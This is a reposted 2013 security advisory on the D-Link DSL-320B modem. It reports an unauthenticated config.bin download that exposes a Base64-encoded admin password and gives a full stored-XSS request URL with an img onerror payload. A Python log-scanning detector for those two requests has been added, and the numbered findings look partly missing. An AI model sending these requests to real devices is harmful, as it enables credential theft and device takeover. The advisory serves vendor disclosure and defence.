Multiple Vulnerabilities in D-Link DSL-320B

SECURITYVULNS:DOC:29377 (securityvulns, vulners.com)
May 06, 2013

Device: DSL-320B

Firmware Version: EU_DSL-320B v1.23 date: 28.12.2010

Vendor URL: http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem

============ Vulnerability Overview: ============

  • Access to the Config file without authentication => full authentication bypass possible! (1)

192.168.178.111/config.bin

===<snip>====
<sysUserName value="admin"/>
<zipb enable="1"/>
<dns dynamic="disable" primary="1.1.1.1" secondary="2.2.2.3" domain="Home" host="alpha"/>
<sysPassword value="dGVzdA=="/>
===<snip>====

=> sysPassword is Base64 encoded

Request:
http://192.168.178.111/home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/bw_status=0&set/bwlist/entry:1/bw_flag=0&set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%20onerror=alert(1)%3E&set/bwlist/entry:1/weekday=6&set/bwlist/entry:1/begintime=00:00&set/bwlist/entry:1/endtime=23:59&set/bwlist/entry:1/store=1&set/bwlist/apply=1

Again you are able to place this XSS without authentication.
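
One way to watch for the two unauthenticated requests described above (the config.bin download and the home_parent.xgi request carrying markup) from a proxy or network sensor in front of the modem's management interface. This is an added example, not part of the original advisory; the log format, the sample lines and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample lines, assumed sensor format: "<client> <method> <url> <status>"
SAMPLE_LOG = """\
192.168.178.20 GET /index.html 200
192.168.178.57 GET /config.bin 200
192.168.178.57 GET /home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%3E&set/bwlist/apply=1 200
192.168.178.20 GET /home/home_parent.xgi?&set/bwlist/entry:1/hostname=laptop&set/bwlist/apply=1 200
192.168.178.99 GET /config.bin 401
"""

# Characters that let a stored value break out of an HTML attribute or tag.
MARKUP = re.compile(r"[<>\"']")


def classify(line):
    """Return the findings for one log line (empty list if nothing matches)."""
    client, method, url, status = line.split()
    parts = urlsplit(url)
    path = parts.path.lower()
    findings = []
    # Config file served: a 200 means the credentials file left the device.
    if path == "/config.bin" and status == "200":
        findings.append("config-download")
    # XGI "set/..." parameters whose decoded value contains markup characters.
    if path.endswith(".xgi"):
        for pair in parts.query.split("&"):
            key, _, value = pair.partition("=")
            if key.startswith("set/") and MARKUP.search(unquote(value)):
                findings.append("markup-in-" + key)
    return findings


def scan(log_text):
    """Return (client, findings) for every well-formed line that matches."""
    hits = []
    for line in log_text.splitlines():
        if len(line.split()) != 4:
            continue  # skip lines that do not fit the assumed format
        findings = classify(line)
        if findings:
            hits.append((line.split()[0], findings))
    return hits


if __name__ == "__main__":
    for client, findings in scan(SAMPLE_LOG):
        print(client, ", ".join(findings))
```

A hit on config-download should be followed by changing the device password, since the value in sysPassword is only Base64 encoded.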

============ Solution ============

Update to firmware version 1.25:

(1) - fixed
(2) - not fixed but authentication needed
(3) - not fixed

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

============ Time Line: ============

17.03.2012 - discovered vulnerabilities
17.03.2013 - informed vendor about the vulnerabilities
25.04.2013 - tested beta version from vendor
30.04.2013 - vendor releases patch
06.05.2013 - public disclosure

===================== Advisory end =====================